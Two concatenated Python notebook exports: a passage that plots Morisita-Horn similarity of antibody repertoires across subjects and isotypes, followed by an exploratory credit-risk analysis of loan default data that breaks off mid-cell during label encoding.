            sec = [s for s in self.subjects if s != self.primary]
            if len(sec) == 0:
                return None
            else:
                return sec[0]
        else:
            return None

    @property
    def comparison_type(self):
        # 'intra' when both repertoires come from one subject, else 'inter'.
        if self._comparison_type is None:
            if len(self.subjects) == 1:
                self._comparison_type = 'intra'
            else:
                self._comparison_type = 'inter'
        return self._comparison_type

    @property
    def scores(self):
        # Mapping of subsample size -> list of MH scores at that size.
        if self._scores is None:
            scores = {}
            for line in self.raw_lines[1:]:
                if line.strip():
                    split_line = line.strip().split()
                    size, _scores = int(split_line[0]), [float(s) for s in split_line[1:]]
                    scores[size] = _scores
            self._scores = scores
        return self._scores

    @property
    def sizes(self):
        # All subsample sizes, in ascending order.
        if self._sizes is None:
            self._sizes = sorted(self.scores.keys())
        return self._sizes

    @property
    def means(self):
        # Mapping of subsample size -> mean MH score at that size.
        if self._means is None:
            means = {}
            for size, scores in self.scores.items():
                means[size] = np.mean(scores)
            self._means = means
        return self._means

    @property
    def color(self):
        # Plot color assigned by the caller (optional).
        return self._color

    @color.setter
    def color(self, color):
        self._color = color

    def mean(self, size):
        """Return the mean MH score at ``size``, or None if that size is absent."""
        return self.means.get(size, None)

    def ci(self, size, percentile=95):
        """Return the (lower, upper) confidence interval of the MH scores at
        ``size`` using a normal approximation, or None if the size is absent."""
        scores = self.scores.get(size, None)
        if scores is None:
            return None
        mean = np.mean(scores)
        std = np.std(scores)
        lower_ci, upper_ci = stats.norm.interval(percentile / 100., loc=mean, scale=std)
        return (lower_ci, upper_ci)

    def plot_data(self, percentile=95, upper_limit=None, lower_limit=None):
        """Return plot-ready parallel lists (sizes, means, lower CIs, upper CIs),
        optionally restricted to sizes within [lower_limit, upper_limit]."""
        sizes = self.sizes
        if lower_limit is not None:
            sizes = [s for s in sizes if s >= lower_limit]
        if upper_limit is not None:
            sizes = [s for s in sizes if s <= upper_limit]
        means = []
        lower_cis = []
        upper_cis = []
        for s in sizes:
            means.append(self.mean(s))
            lci, uci = self.ci(s, percentile=percentile)
            lower_cis.append(lci)
            upper_cis.append(uci)
        return sizes, means, lower_cis, upper_cis


# ### Read the similarity datafile and make Comparison objects
#
# The header for each pairwise comparison in the datafile starts with a `'#'`, so if we read the entire datafile and split by the `'#'` character, we get a list of strings each containing the similarity data for a single pairwise comparison.
#
# If you've generated your own MH similarity data using the above data processing code, by default it will be saved to `'../01_data_processing/data/user-calculated_mh_similarity/mh-similarities_combined.txt'`. Replacing the path to the default datafile with this path will create plots based on your data rather than the data in the paper.

with open('../01_data_processing/data/mh_similarity/mh-similarities_combined.txt') as f:
    data = f.read()
# Each '#'-delimited chunk is one pairwise comparison.
comps = [Comparison(d) for d in data.split('#') if d.strip()]

# ### Subjects and colors
#
# The list of subject colors is maintained throughout all of the figures in the manuscript. It's similar to the standard HLS palette created by Seaborn, but with the 4th and 5th colors modified slightly to make them more distinguishable.
# +
# All subjects that appear in any comparison, sorted for a stable color order.
subjects = sorted(list(set([subject for comp in comps for subject in comp.subjects])))

# 10-color HLS palette; the 4th and 5th entries are replaced with hues taken
# from larger palettes so that neighboring colors are easier to tell apart.
color_list = sns.hls_palette(10, s=0.9)
color_list[3] = sns.hls_palette(11, s=0.9)[3]
color_list[4] = sns.hls_palette(12, s=0.9)[5]
sns.palplot(color_list)
plt.show()

# one fixed color per subject, reused across all figures
color_dict = {s: c for s, c in zip(subjects, color_list)}
# -

# ## Line plots of MH similarity

# +
def similarity_plot(comparisons, colors=None, figfile=None, fill_between_alpha=0.2,
                    line_alpha=0.85, legend_location='lower right'):
    """Plot mean MH similarity vs. subsample size (log x-axis) for each
    Comparison in ``comparisons``, with shaded confidence intervals.

    If ``colors`` is None, per-Comparison colors are used when every
    Comparison has one; otherwise an HLS palette is generated. The figure is
    shown inline when ``figfile`` is None, else saved to that path.
    """
    # set color values
    if colors is None:
        if all([c.color is not None for c in comparisons]):
            colors = [c.color for c in comparisons]
        else:
            colors = sns.hls_palette(s=0.8, n_colors=len(comparisons))
    sns.set_style('white')
    fig = plt.figure(figsize=(6, 6))
    plt.xscale('log')
    # plot the CI shading first
    for i, comp in enumerate(comparisons):
        sizes, means, lower_cis, upper_cis = comp.plot_data()
        plt.fill_between(sizes, lower_cis, upper_cis, color=colors[i], alpha=fill_between_alpha)
    # iterate through the subjects again and plot the mean lines
    # so that they're on top of all of the CI shading
    for i, comp in enumerate(comparisons):
        sizes, means, lower_cis, upper_cis = comp.plot_data()
        label = comp.subjects if comp.comparison_type == 'intra' else [comp.primary, comp.secondary]
        plt.plot(sizes, means, linewidth=2, c=colors[i], alpha=line_alpha, label=' vs '.join(label))
    # plot the horizontal reference lines
    for y in np.arange(0., 1.01, 0.2):
        ls = ':'
        lw = 1
        alpha = 0.5
        plt.axhline(y=y, xmin=0, xmax=10, linewidth=lw, color='k', linestyle=ls, alpha=alpha)
    # plot configuration
    ax = plt.gca()
    ax.set_ylim(0, 1.01)
    # axis labels
    ax.set_ylabel('Morisita-Horn similarity', fontsize=14)
    ax.set_xlabel('Sequence count', fontsize=14)
    # change the fontsize of the tick labels
    ax.tick_params(axis='x', labelsize=12, length=6, width=1.25, pad=8, top=False)
    ax.tick_params(axis='x', which='minor', labelsize=0, length=4, width=1, top=False)
    ax.tick_params(axis='y', which='major', labelsize=12, length=0, pad=6, right=False)
    # hide top, left and right spines
    ax.spines['top'].set_visible(False)
    ax.spines['right'].set_visible(False)
    ax.spines['left'].set_visible(False)
    # configure the legend
    handles, labels = ax.get_legend_handles_labels()
    legend = ax.legend(handles, labels, loc=legend_location, fontsize=12,
                       frameon=True, borderpad=0.5, labelspacing=0.4)
    legend.get_frame().set_facecolor('w')
    legend.get_frame().set_edgecolor('w')
    # save or show the image
    if figfile is None:
        plt.show()
    else:
        plt.tight_layout()
        plt.savefig(figfile)


def plot_single_comparison_set(subject, figfile=None, legend_location='lower right'):
    """Plot one subject's intra-subject comparison plus every inter-subject
    comparison involving that subject, colored by the global color_dict."""
    # retrieve and sort the comparison data
    _comps = [c for c in comps if subject in c.subjects]
    for c in _comps:
        c.primary = subject
    intra = [c for c in _comps if c.comparison_type == 'intra']
    inter = sorted([c for c in _comps if c.comparison_type == 'inter'], key=lambda x: x.secondary)
    _comps = intra + inter
    # retrieve and order the color values
    colors = [color_dict[subject]] + [color_dict[c.secondary] for c in inter]
    # make the similarity plot
    similarity_plot(_comps, colors=colors, legend_location=legend_location, figfile=figfile)
# -

# ### Make the MH similarity line plots
#
# By default, the plots will be shown inline but not saved. To save the figure files (in PDF format), uncomment the `figfile=...` line below. To change the format in which the file is saved (JPG, TIFF, etc), simply change the extension of the figfile name (replace `.pdf` with `.jpg`, for example).
# Draw one similarity line plot per subject (intra + all inter comparisons).
for subject in subjects:
    print(subject)
    plot_single_comparison_set(subject,
#                                figfile='./figures/MH similarity/{}_vj-cdr3len_similarity.pdf'.format(subject)
                              )

# ## Clustermap of cross-subject similarity
#
# Transform comparison data into a DataFrame, using the 1,000,000 sequence sample size as the comparison measure

# +
# Build a symmetric subject-by-subject matrix of mean MH scores at the
# 1,000,000-sequence subsample size.
comp_dict = {}
for comp in comps:
    subjects = comp.subjects
    if len(subjects) == 1:
        # intra-subject comparison: duplicate the name so it fills the diagonal
        subjects = subjects * 2
    s1, s2 = subjects
    if s1 not in comp_dict:
        comp_dict[s1] = {}
    if s2 not in comp_dict:
        comp_dict[s2] = {}
    score = comp.means[1000000]
    comp_dict[s1][s2] = score
    comp_dict[s2][s1] = score

comp_df = pd.DataFrame(comp_dict)
# -

# To save the clustermap figure (instead of showing inline but not saving, which is the default behavior), comment out the `plt.show()` line and uncomment the last two lines in the code block. If you'd like to save the figure in a format other than PDF, replace the extension of the filename to your desired format (`.jpg` or `.png`, for example).
#
# Note that we tweaked this figure slightly in Illustrator to make it a little more visually appealing. The following edits were made:
# * Removed the top dendrogram (currently, Seaborn doesn't support clustering along an axis without also showing the dendrogram in the plot)
# * Increased the line weight of the left dendrogram
# * Moved the x-axis labels to the top of the clustermap
# * Removed the colorbar

# +
plt.figure(figsize=[7, 4])
# Truncated grey colormap keeps both extremes readable; per-subject colors
# are shown along both axes via row_colors/col_colors.
cm = sns.clustermap(comp_df, cmap=truncate_colormap('Greys', minval=0.15, maxval=0.9),
                    linewidth=4, row_colors=color_list, col_colors=color_list)
ax = cm.ax_heatmap
ax.set_yticklabels(ax.get_yticklabels(), rotation=0, fontsize=20)
ax.set_xticklabels(ax.get_xticklabels(), rotation=60, fontsize=20)
plt.show()
# plt.tight_layout()
# cm.savefig('./figures/similarity_clustermap.pdf')
# -

# ## Box/scatter plot of MH similarity by isotype
#
# To get a better idea of the relative contributions of memory (antigen experienced) and naive (antigen inexperienced) repertoires on overall repertoire similarity, we grouped sequences into "isotype classes" and computed MH similarity on each of the classes. The isotype classes are:
#
# * **IgM, with less than two mutations:** these sequences are not class-switched and are minimally mutated, meaning they should be enriched in sequences from naive B cells
# * **IgM, with two or more mutations:** these sequences are not class-switched but have evidence of somatic mutation, suggesting enrichment of sequences from IgM memory B cells.
# * **IgG:** these sequences are class-switched, indicating they come exclusively from IgG memory B cells.
#
# First, we load all of the datasets:

# +
# all sequences
with open('../01_data_processing/data/mh_similarity/mh-similarities_combined.txt') as f:
    data = f.read()
all_comps = [Comparison(d) for d in data.split('#') if d.strip()]

# IgM with less than 2 mutations
with open('../01_data_processing/data/mh_similarity/mh-similarities_combined_IgM-lte1-ntmuts.txt') as f:
    data = f.read()
igmlte1_comps = [Comparison(d) for d in data.split('#') if d.strip()]

# IgM with 2 or more mutations
with open('../01_data_processing/data/mh_similarity/mh-similarities_combined_IgM-gt1-ntmuts.txt') as f:
    data = f.read()
igmgt1_comps = [Comparison(d) for d in data.split('#') if d.strip()]

# IgG
with open('../01_data_processing/data/mh_similarity/mh-similarities_combined_IgG.txt') as f:
    data = f.read()
igg_comps = [Comparison(d) for d in data.split('#') if d.strip()]
# -

# ### Combine all of the isotype data into a single DataFrame

# +
# One row per comparison per isotype class, again using the mean MH score at
# the 1,000,000-sequence subsample size.
data = []
for i, comp in enumerate(all_comps):
    d = {'num': i, 'Morisita-Horn similarity': comp.means[1000000],
         'isotype': 'All', 'Comparison type': comp.comparison_type}
    data.append(d)
for i, comp in enumerate(igmlte1_comps):
    d = {'num': i, 'Morisita-Horn similarity': comp.means[1000000],
         'isotype': 'IgM (<2 mutations)', 'Comparison type': comp.comparison_type}
    data.append(d)
for i, comp in enumerate(igmgt1_comps):
    d = {'num': i, 'Morisita-Horn similarity': comp.means[1000000],
         'isotype': 'IgM (2+ mutations)', 'Comparison type': comp.comparison_type}
    data.append(d)
for i, comp in enumerate(igg_comps):
    d = {'num': i, 'Morisita-Horn similarity': comp.means[1000000],
         'isotype': 'IgG', 'Comparison type': comp.comparison_type}
    data.append(d)
df = pd.DataFrame(data)
# -

# ### Make the box/scatter plot
#
# By default, the figure will be shown inline and not saved. To save the plot, comment out the `plt.show()` line and uncomment the last two lines of the code block.

# +
sns.set_style('white')
plt.figure(figsize=(5, 4.5))

# make the boxplot
box = sns.boxplot(data=df, x='Comparison type', y='Morisita-Horn similarity', hue='isotype',
                  fliersize=0, saturation=1., palette=['0.5', '0.65', '0.8', '0.9'],
                  hue_order=['All', 'IgM (<2 mutations)', 'IgM (2+ mutations)', 'IgG'],
                  linewidth=2)

# overlay the scatterplot
sns.stripplot(data=df, x='Comparison type', y='Morisita-Horn similarity', hue='isotype',
              palette=['0.25', '0.25', '0.25', '0.25'],
              hue_order=['All', 'IgM (<2 mutations)', 'IgM (2+ mutations)', 'IgG'],
              jitter=True, dodge=True, alpha=0.4)

# draw the horizontal reference lines
for y in np.arange(0.5, 1.01, 0.1):
    ls = ':'
    lw = 1
    alpha = 0.5
    plt.axhline(y=y, xmin=0, xmax=10, linewidth=lw, color='k', linestyle=ls, alpha=alpha)

# style the plot
ax = plt.gca()

# axis limits and labels
ax.set_ylim([0.4, 1.05])
ax.set_ylabel('Morisita-Horn similarity', fontsize=14)
ax.set_xlabel('Comparison type', fontsize=14)

# axis tick appearance
ax.tick_params(axis='x', labelsize=12, direction='out', width=1.5, length=6, pad=8, top=False)
ax.tick_params(axis='y', which='major', labelsize=12, length=6, width=1.25, pad=4, right=False, left=False)

# remove top, left and right spines
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)

# configure the legend (only the first 4 handles: the stripplot duplicates them)
handles, labels = ax.get_legend_handles_labels()
legend = ax.legend(handles[:4], labels[:4], loc='lower left', fontsize=11, frameon=True)
legend.get_frame().set_facecolor('w')
legend.get_frame().set_edgecolor('w')

plt.show()
# plt.tight_layout()
# plt.savefig('./figures/similarity-boxplot_by-isotype.pdf')
# -
# ---- source file: make_figures/02_morisita-horn_similarity.ipynb ----
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # + import pickle import requests import pandas_profiling import multiprocessing import json import numpy as np import pandas as pd import seaborn as sns from IPython.core.display import HTML from IPython.display import Image from tabulate import tabulate from sklearn.preprocessing import LabelEncoder from sklearn.model_selection import train_test_split from sklearn.tree import DecisionTreeClassifier from sklearn.metrics import accuracy_score, classification_report,confusion_matrix from scipy import stats as ss from sklearn.preprocessing import RobustScaler, MinMaxScaler from pandas_profiling import ProfileReport import matplotlib.pyplot as plt import plotly.express as px # - # # 0.0 Imports # ## 0.1 Helper Functions # + def jupyter_settings(): # %matplotlib inline # %pylab inline plt.style.use( 'bmh' ) plt.rcParams['figure.figsize'] = [18, 10] plt.rcParams['font.size'] = 24 display( HTML( '<style>.container { width:100% !important; }</style>') ) pd.options.display.max_columns = None pd.options.display.max_rows = None pd.set_option( 'display.expand_frame_repr', False ) sns.set() def cramer_v (x,y): cm = pd.crosstab(x, y).values n = cm.sum() r,k = cm.shape chi2 = ss.chi2_contingency( cm )[0] chi2corr = max(0, chi2 - (k-1)*(r-1)/(n-1)) kcorr = k - (k -1)**2/(n-1) rcorr = r - (r -1)**2/(n-1) return np.sqrt((chi2corr/n)/(min(kcorr-1, rcorr-1))) # - jupyter_settings() # ## 0.2 Loanding Data df_credit = pd.read_csv("credit_risk_dataset.csv", index_col = False, low_memory = False) df_credit.sample(5) # # 1.0 Data Descriptive df1 = df_credit.copy() # # 1.1 Data Dimensions print ('Number of Rows: {}'.format( df1.shape[0])) print ('Number of Cols: {}'.format (df1.shape[1])) # # 1.2 Data Types print(df1.dtypes) # # 1.3 Check NA 
df1.duplicated().sum()

# drop exact duplicate rows before any statistics
df1 = df1.drop_duplicates()

df1.isnull().sum()

# # 1.4 Fillout NA

# mean interest rate per loan grade, used to impute missing loan_int_rate
df_media_int = df1[['loan_int_rate', 'loan_grade']].groupby ('loan_grade').agg('mean').reset_index()
df_media_int

# +
## person_emp_length
# Assumption for the missing values: the person is currently unemployed.
df1['person_emp_length'].fillna(0, inplace = True)

## loan_int_rate
# Assumption for the missing values: incomplete data collection — impute with
# the per-grade mean interest rate computed above (values hard-coded here).
grande_int_mean = {'A': 7.328423, 'B': 10.995756, 'C': 13.464579, 'D': 15.360698 , 'E': 17.008409, 'F': 18.609159, 'G': 20.251525}
df1['loan_int_rate'] = df1['loan_int_rate'].fillna(df1['loan_grade'].map(grande_int_mean))
# -

df1.head()

# persist the cleaned dataset for the dashboard
df_dashboard = df1.to_csv('df_dashboard.csv', index = False)

# # 1.5 Descriptive Statistical

num_attributes = df1.select_dtypes( include = ['int64', 'float64'])
cat_attributes = df1.select_dtypes( exclude = ['int64', 'float64'])

# # 1.5.1 Numerical Attributes

# +
# Central Tendency - Mean, Median
ct1 = pd.DataFrame (num_attributes.apply (np.mean)).T
ct2 = pd.DataFrame (num_attributes.apply (np.median)).T

# Dispersion - std, min, max, range, skew, kurtosis
d1 = pd.DataFrame (num_attributes.apply (np.std)).T
d2 = pd.DataFrame (num_attributes.apply (min)).T
d3 = pd.DataFrame (num_attributes.apply (max)).T
d4 = pd.DataFrame (num_attributes.apply (lambda x: x.max() - x.min())).T
d5 = pd.DataFrame (num_attributes.apply (lambda x: x.skew())).T
d6 = pd.DataFrame (num_attributes.apply (lambda x: x.kurtosis())).T

# Concatenate
t = pd.concat ((d2, d3, d4, ct1, ct2, d1, d5, d6)).T.reset_index()
t.columns =['attributes', 'min', 'max', 'range', 'mean', 'median', 'std', 'skew', 'kurtosis']
t
# -

# remove implausible outliers: ages above 100 and employment above 50 years
df1 = df1.drop(df1[df1['person_age'] > 100].index)
df1 = df1.drop(df1[df1['person_emp_length'] > 50].index).reset_index()

df1.dtypes

# # 1.5.1 Categorical Attributes

cat_attributes.apply(lambda x: x.unique().shape[0])

# NOTE(review): the explicit category order below is arbitrary for nominal
# variables, so the "median" of the category codes depends on that order —
# interpret the printed median with care.
categories = ['OWN', 'MORTGAGE', 'RENT', 'OTHER']
df1['person_home_ownership'] = pd.Categorical(df1['person_home_ownership'], categories)
median_value = np.median(df1['person_home_ownership'].cat.codes)
median_text = categories[int(median_value)]
print(median_value, median_text)

df1['person_home_ownership'].value_counts(normalize = True)*100

categories = ['EDUCATION', 'MEDICAL', 'VENTURE', 'PERSONAL', 'HOMEIMPROVEMENT', 'DEBTCONSOLIDATION']
df1['loan_intent'] = pd.Categorical(df1['loan_intent'], categories)
median_value = np.median(df1['loan_intent'].cat.codes)
median_text = categories[int(median_value)]
print(median_value, median_text)

df1['loan_intent'].value_counts(normalize = True)*100

categories = ['A', 'B', 'C', 'D', 'E', 'F', 'G']
df1['loan_grade'] = pd.Categorical(df1['loan_grade'], categories)
median_value = np.median(df1['loan_grade'].cat.codes)
median_text = categories[int(median_value)]
print(median_value, median_text)

df1['loan_grade'].value_counts(normalize = True)*100

categories = ['N', 'Y']
df1['cb_person_default_on_file'] = pd.Categorical(df1['cb_person_default_on_file'], categories)
median_value = np.median(df1['cb_person_default_on_file'].cat.codes)
median_text = categories[int(median_value)]
print(median_value, median_text)

df1['cb_person_default_on_file'].value_counts(normalize = True)*100

# # 2.0 Feature Engineering

df2 = df1.copy()

# # 2.1 Hypotheses Mind Map

Image ('img/Credit_Risk_Dataset.png')

# # 2.2 Hypothesis Creation

# **1.** Younger clients tend to take out more loans
#
# **2.** Clients with more than seven years of good credit history tend to repay their loans more often
#
# **3.** Clients who own their home tend to repay their loans more often
#
# **4.** Clients whose loan purpose is home improvement are the majority
#
# **5.** Riskier loans tend to carry higher interest rates
#
# **6.** Clients employed for fewer than ten years tend to repay their loans less often
#
# **7.** Clients with income above 20000 tend to repay their loans more often
#
# **8.** Clients with a higher loan grade
# tend to repay their loans less often (continuation of hypothesis 8 above)

# # 3.0 Exploratory Data Analysis

df3 = df2.copy()


# +
def test_profile():
    """Generate a pandas-profiling report of df3 and write it to credit_out.html."""
    proof = pandas_profiling.ProfileReport(df3)
    proof.to_file("credit_out.html")

if __name__ == '__main__':
    # freeze_support() keeps pandas-profiling's multiprocessing workers happy
    # on platforms that spawn subprocesses (e.g. Windows).
    multiprocessing.freeze_support()
    test_profile()
# -

# # 3.1 Univariate Analysis

# ## 3.1.1 Response Variable

plt.rcParams['figure.figsize'] = [16, 8]
df3['loan_status'].value_counts().plot.barh(title="Proportion of Status")

# ## 3.1.2 Numerical Variable

num_attributes.hist(bins = 25);

# ## 3.1.3 Categorical Variable

cat_attributes.head()

# +
# person_home_ownership
plt.subplot (2,1,1)
sns.countplot(x = 'person_home_ownership', data = df3)

# loan_intent
plt.subplot (2,1,2)
sns.countplot(x = 'loan_intent', data = df3)

# +
# loan_grade
plt.subplot (2,1,1)
sns.countplot(x = 'loan_grade', data = df3)

# cb_person_default_on_file
plt.subplot (2,1,2)
sns.countplot(x = 'cb_person_default_on_file', data = df3)
# -

# # 3.2 Bivariate Analysis

# **H1.** Younger clients tend to take out more loans

# +
n_obs = df3.shape[0]
# ages 20-50, 10-year bins; shares are relative to the whole dataset
bins = list(np.arange( 20, 50, 10))
df3['age_binned'] = pd.cut (df3['person_age'], bins = bins)
counts = (df3[['age_binned','loan_status']]
          .groupby(['age_binned','loan_status'])
          .size()
          .div(n_obs)
          .unstack('loan_status')
         )
ax = counts.plot.bar()
ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' )

# +
# ages 50-100, same binning scheme
bins1 = list(np.arange( 50, 100, 10))
df3['age_binned1'] = pd.cut (df3['person_age'], bins = bins1)
counts1 = (df3[['age_binned1','loan_status']]
           .groupby(['age_binned1','loan_status'])
           .size()
           .div(n_obs)
           .unstack('loan_status')
          )
ax = counts1.plot.bar()
ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' )
# -

# per-bin percentage of repaid (0) vs defaulted (1) loans
age = pd.concat([counts, counts1], axis=0)
age['0 em %'] = age[0]/(age[0] + age[1])*100
age['1 em %'] = age[1]/(age[0] + age[1])*100
age

# **H2.** Clients with more than seven years of good credit history tend to repay their loans more often

# +
n_obs = df3.shape[0]
# credit history length 2-16 years, 1-year bins
bins2 = list(np.arange( 2, 16, 1))
df3['hist_binned'] = pd.cut (df3['cb_person_cred_hist_length'], bins = bins2)
counts2 = (df3[['hist_binned','loan_status']]
           .groupby(['hist_binned','loan_status'])
           .size()
           .div(n_obs)
           .unstack('loan_status')
          )
ax = counts2.plot.bar()
ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' )

# +
# credit history length 16-31 years, 1-year bins
bins3 = list(np.arange( 16, 31, 1))
# BUGFIX: this previously cut df3['person_age'], silently mixing age data into
# the credit-history analysis; H2 is about cb_person_cred_hist_length (the
# paired cell above uses the same column with the contiguous 2-16 bins).
df3['hist_binned1'] = pd.cut (df3['cb_person_cred_hist_length'], bins = bins3)
counts3 = (df3[['hist_binned1','loan_status']]
           .groupby(['hist_binned1','loan_status'])
           .size()
           .div(n_obs)
           .unstack('loan_status')
          )
ax = counts3.plot.bar()
ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' )
# -

hist_length = pd.concat([counts2, counts3], axis=0)
hist_length['0 em %'] = hist_length[0]/(hist_length[0] + hist_length[1])*100
hist_length['1 em %'] = hist_length[1]/(hist_length[0] + hist_length[1])*100
hist_length

# **3.** Clients who own their home tend to repay their loans more often

# +
n_obs = df3.shape[0]
counts4 = (df3[['person_home_ownership','loan_status']]
           .groupby(['person_home_ownership','loan_status'])
           .size()
           .div(n_obs)
           .unstack('loan_status')
          )
ax = counts4.plot.bar()
ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status')
# -

counts4['0 em %'] = counts4[0]/(counts4[0] + counts4[1])*100
counts4['1 em %'] = counts4[1]/(counts4[0] + counts4[1])*100
counts4

# **4.** Clients whose loan purpose is home improvement are the majority

# +
n_obs = df3.shape[0]
counts5 = (df3[['loan_intent','loan_status']]
           .groupby(['loan_intent','loan_status'])
           .size()
           .div(n_obs)
           .unstack('loan_status')
          )
ax = counts5.plot.bar()
ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status')
# -

counts5['0 em %'] = counts5[0]/(counts5[0] + counts5[1])*100
counts5['1 em %'] = counts5[1]/(counts5[0] + counts5[1])*100
counts5['Quantidade Total em %'] = (counts5[0] + counts5[1])*100
counts5

# **5.** Clients whose loans carry
# higher interest rates tend to repay their loans less often
# (continuation of hypothesis 5 from the previous markdown cell)

# +
n_obs = df3.shape[0]
# interest rate in 5-point bins
bins4 = [5,10,15,20,25]
df3['rate_binned'] = pd.cut (df3['loan_int_rate'], bins = bins4)
counts6 = (df3[['rate_binned','loan_status']]
           .groupby(['rate_binned','loan_status'])
           .size()
           .div(n_obs)
           .unstack('loan_status')
          )
ax = counts6.plot.bar()
ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' )
# -

counts6['0 em %'] = counts6[0]/(counts6[0] + counts6[1])*100
counts6['1 em %'] = counts6[1]/(counts6[0] + counts6[1])*100
counts6['Quantidade Total em %'] = (counts6[0] + counts6[1])*100
counts6

# **6.** Clients employed for fewer than ten years tend to repay their loans less often

# +
# employment length 0-20 years, 5-year bins
bins5 = list(np.arange( 0, 20, 5))
df3['emp_length_binned'] = pd.cut (df3['person_emp_length'], bins = bins5)
counts7 = (df3[['emp_length_binned','loan_status']]
           .groupby(['emp_length_binned','loan_status'])
           .size()
           .div(n_obs)
           .unstack('loan_status')
          )
ax = counts7.plot.bar()
ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' )

# +
# employment length 20-45 years, 5-year bins
bins6 = list(np.arange( 20, 45, 5))
df3['emp_length_binned1'] = pd.cut (df3['person_emp_length'], bins = bins6)
counts8 = (df3[['emp_length_binned1','loan_status']]
           .groupby(['emp_length_binned1','loan_status'])
           .size()
           .div(n_obs)
           .unstack('loan_status')
          )
ax = counts8.plot.bar()
ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' )

# +
emp_length = pd.concat([counts7, counts8], axis=0)
emp_length['0 em %'] = emp_length[0]/(emp_length[0] + emp_length[1])*100
emp_length['1 em %'] = emp_length[1]/(emp_length[0] + emp_length[1])*100
emp_length['Quantidade Total em %'] = (emp_length[0] + emp_length[1])*100
emp_length
# -

# **7.** Clients with income above 20000 tend to repay their loans more often

# +
bins7 = list(np.arange( 4000, 34000, 4000))
df3['person_income_binned'] = pd.cut (df3['person_income'], bins = bins7)
counts9 = (df3[['person_income_binned','loan_status']]
           .groupby(['person_income_binned','loan_status'])
           .size()
           .div(n_obs)
           .unstack('loan_status')
          )
ax = counts9.plot.bar()
ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' )
# -

counts9['0 em %'] = counts9[0]/(counts9[0] + counts9[1])*100
counts9['1 em %'] = counts9[1]/(counts9[0] + counts9[1])*100
counts9

# **8.** Clients with a higher loan grade tend to repay their loans less often

# +
n_obs = df3.shape[0]
counts10 = (df3[['loan_grade','loan_status']]
            .groupby(['loan_grade','loan_status'])
            .size()
            .div(n_obs)
            .unstack('loan_status')
           )
ax = counts10.plot.bar()
ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status')
# -

counts10['0 em %'] = counts10[0]/(counts10[0] + counts10[1])*100
counts10['1 em %'] = counts10[1]/(counts10[0] + counts10[1])*100
counts10['Quantidade Total em %'] = (counts10[0] + counts10[1])*100
counts10

# summary of the hypothesis verdicts (table text kept in the original language)
tab =[['Hipóteses', 'Conclusão', 'Relevância'],
      ['H1', 'Verdadeira', 'Alta'],
      ['H2', 'Há Excessões', 'Media'],
      ['H3', 'Verdadeira', 'Media'],
      ['H4', 'Falsa', 'Media'],
      ['H5', 'Verdadeira', 'Alta'],
      ['H6', 'Há Excessões', 'Media'],
      ['H7', 'Verdadeira', 'Alta'],
      ['H8', 'Verdadeira', 'Alta']
     ]
print( tabulate( tab ) )

# # 3.3 Multivariate Analysis

# #### 3.3.1 Numerical Variable

# +
# Pearson correlation heatmap, masking the upper triangle (it is symmetric).
corr = num_attributes.corr( method = 'pearson')
mask = np.zeros_like(corr)
mask[np.triu_indices_from(mask)] = True
with sns.axes_style("white"):
    ax = sns.heatmap(corr, mask=mask, square=True, annot = True)
# -

# #### 3.3.2 Categorical Variable

df3.head()

# +
# pairwise Cramer's V between every pair of categorical attributes
cat_attributes_list = cat_attributes.columns.tolist()
corr_dict = {}
for i in range (len (cat_attributes_list)):
    corr_list = []
    for j in range (len (cat_attributes_list)):
        ref = cat_attributes_list[i]
        feat = cat_attributes_list[j]
        # correlation
        corr = cramer_v(df3[ref], df3[feat])
        # append a list
        corr_list.append (corr)
    # append a correlation list for each ref attribute
    corr_dict[ref] = corr_list

# +
d = pd.DataFrame (corr_dict)
d = d.set_index (d.columns)
sns.heatmap (d, annot = True)
# -

# ## 4.0. Data Preparation

df4 = df3.copy()
df3.head()

# ### 4.1. Rescaling

# +
# NOTE: the same RobustScaler instance is refit for each column; each pickle
# is dumped immediately after the corresponding fit, so every saved scaler
# reflects the column named in its filename.
rs = RobustScaler()
mms = MinMaxScaler()

# person_age
df4['person_age'] = rs.fit_transform ( df4[['person_age']].values)
pickle.dump( rs, open( '/Users/marin/reposit/Credit_Card_Risk/deploy/person_age_scaler.pkl', 'wb' ))

# person_income
df4['person_income'] = rs.fit_transform ( df4[['person_income']].values)
pickle.dump( rs, open( '/Users/marin/reposit/Credit_Card_Risk/deploy/person_income_scaler.pkl', 'wb' ))

# person_emp_length
df4['person_emp_length'] = rs.fit_transform ( df4[['person_emp_length']].values)

# loan_amnt
df4['loan_amnt'] = rs.fit_transform ( df4[['loan_amnt']].values)
pickle.dump( rs, open( '/Users/marin/reposit/Credit_Card_Risk/deploy/loan_amnt_scaler.pkl', 'wb' ))

# loan_int_rate
df4['loan_int_rate'] = mms.fit_transform ( df4[['loan_int_rate']].values)

# loan_percent_income
df4['loan_percent_income'] = rs.fit_transform ( df4[['loan_percent_income']].values)

# cb_person_cred_hist_length
df4['cb_person_cred_hist_length'] = rs.fit_transform ( df4[['cb_person_cred_hist_length']].values)
# -

# ### 4.2. Transformation

# +
# person_home_ownership
lab_enc_home = LabelEncoder()
df4['person_home_ownership'] = lab_enc_home.fit_transform(df4['person_home_ownership'])
pickle.dump( lab_enc_home, open( '/Users/marin/reposit/Credit_Card_Risk/deploy/person_home_ownership_scaler.pkl', 'wb' ))

# loan_intent
lab_enc_intent = LabelEncoder()
# BUGFIX: this previously called lab_enc_home.fit_transform, which left
# lab_enc_intent unfitted and silently refit the home-ownership encoder on an
# unrelated column. The numeric output is identical either way.
df4['loan_intent'] = lab_enc_intent.fit_transform(df4['loan_intent'])

# cb_person_default_on_file
lab_enc_file = LabelEncoder()
# BUGFIX: same as above — use the dedicated encoder, not lab_enc_home.
